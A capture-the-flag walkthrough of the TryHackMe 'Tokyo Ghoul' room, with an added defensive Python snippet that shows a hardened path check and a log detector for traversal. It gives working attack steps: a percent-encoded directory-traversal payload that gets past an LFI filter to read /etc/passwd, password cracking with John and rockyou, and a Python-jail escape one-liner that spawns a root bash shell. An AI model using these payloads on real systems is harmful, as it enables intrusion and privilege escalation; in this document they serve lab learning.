TryHackMe: Tokyo Ghoul

Today we will take a look at TryHackMe: Tokyo Ghoul. My goal in sharing this writeup is to point you in the right direction if you get stuck. Please try to understand each step and take notes. Then you can start watching the anime. ;)

Recon

Task 1: About the room

# Read the above

> No answer needed

# Deploy the machine

> No answer needed

Task 2: Where am I?

# Use nmap to scan all ports

Command: sudo nmap -sS -sC -sV -oN nmap/initial $IP

# How many ports are open?

> *

# What is the OS used?

> U*****

Task 3: Planning to escape

# Did you find the note that the other ghouls gave you? Where did you find it?

> j********.****

# What is the key for the Rize executable?

## Let’s check the FTP port and get the files we need from it

Command: ftp IP

##Let’s look at the files.

## Here we see an ELF (Executable and Linkable Format) file

## Let’s make the file executable

Command: sudo chmod +x need_to_talk

Command: ./need_to_talk

## Extract the printable strings from the binary with the strings command

Command: strings need_to_talk

> k********

# Use a tool to get the other note from Rize.

## Let’s run the file again now that we have found the password.

## Now let’s get the note from the picture with the given passphrase

Command: steghide extract -sf rize_and_kaneki.jpg

Task 4: What is Rize trying to say?

# What does the message mean? Did you understand it? What does it say?

## When we open the text, we are greeted by Morse code.

## Let’s try to read

## After decoding the Morse we are confronted with more encoded text. We do not know what it is, so we turn to CyberChef.

> d***************

# Can you see the weakness in the dark? No? Just search.

## Let’s check the site directory

Command: gobuster dir -u http://10.10.255.75/d******/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

## The new page gives us a choice; I checked both and they lead to the same place.

# Did you find something? Crack it.

## I wanted to test for LFI, but the page answered me like this

## So we need to bypass the filter on the back end. Let’s do some research.

https://raw.githubusercontent.com/emadshanab/LFI-Payload-List/master/LFI%20payloads.txt

## This percent-encoded traversal from the list gets past the filter:

/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

## I’m not silly dude ;)
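As an added defensive illustration (not part of the original writeup), here is the kind of blocklist filter that rejects a literal `../` yet lets the percent-encoded form above through, beside a hardened resolver that decodes and normalises the path before checking that it stays inside the document root, plus a small log scanner that uses the same check to flag such requests. The document root `/var/www/html`, the `view` parameter and the log lines are all constructed assumptions.

```python
import posixpath
import re
from typing import List, Optional
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"   # assumption: the app's document root


def naive_filter_allows(raw_param: str) -> bool:
    """The weak check: rejects a literal '../' in the raw query value only,
    so a percent-encoded '%2e%2e/' goes straight past it."""
    return "../" not in raw_param


def resolve_safely(raw_param: str, base: str = WEB_ROOT) -> Optional[str]:
    """Hardened check: decode (repeatedly, to catch double encoding),
    normalise, and require the result to stay under `base`.
    Returns the resolved absolute path, or None if it escapes."""
    decoded = raw_param
    for _ in range(3):                    # bounded: no endless decode loop
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    if "\x00" in decoded:                 # NUL bytes truncate paths in C libraries
        return None
    candidate = posixpath.normpath(posixpath.join(base, decoded.lstrip("/")))
    if candidate != base and not candidate.startswith(base + "/"):
        return None
    return candidate


# Constructed access-log lines (not from the room); `view` is an assumed parameter.
SAMPLE_LOG = [
    'GET /app/index.php?view=about.php HTTP/1.1" 200',
    'GET /app/index.php?view=../../etc/passwd HTTP/1.1" 403',
    'GET /app/index.php?view=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200',
]


def flag_traversal(lines: List[str]) -> List[str]:
    """Detection: flag any request whose `view` value would escape WEB_ROOT
    once decoded, even when the naive filter let it through."""
    hits = []
    for line in lines:
        m = re.search(r"[?&]view=(\S+)", line)
        if m and resolve_safely(m.group(1)) is None:
            hits.append(line)
    return hits


if __name__ == "__main__":
    for line in flag_traversal(SAMPLE_LOG):
        print("traversal attempt:", line)
```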

# What is Rize's username?

> k********

# What is Rize's password?

## Let’s use John and the rockyou list.

Command: sudo john hash --wordlist=/usr/share/wordlists/rockyou.txt

> p**********

Task 5: Fight Jason

# User.txt

## Let’s connect with ssh.

Command: ssh username@IP

# root.txt

## List the commands we are allowed to run with sudo

Command: sudo -l

## We see a Python jail here. After some research, I found a bypass

Command: __builtins__.__dict__['__IMPORT__'.lower()]('PTY'.lower()).__dict__['SPAWN'.lower()]('/bin/bash')

## And now we are root

“If you have any questions or comments, please do not hesitate to write. Have a good day”


Hello, my name is Elman. I am from Azerbaijan. I wish you a good day
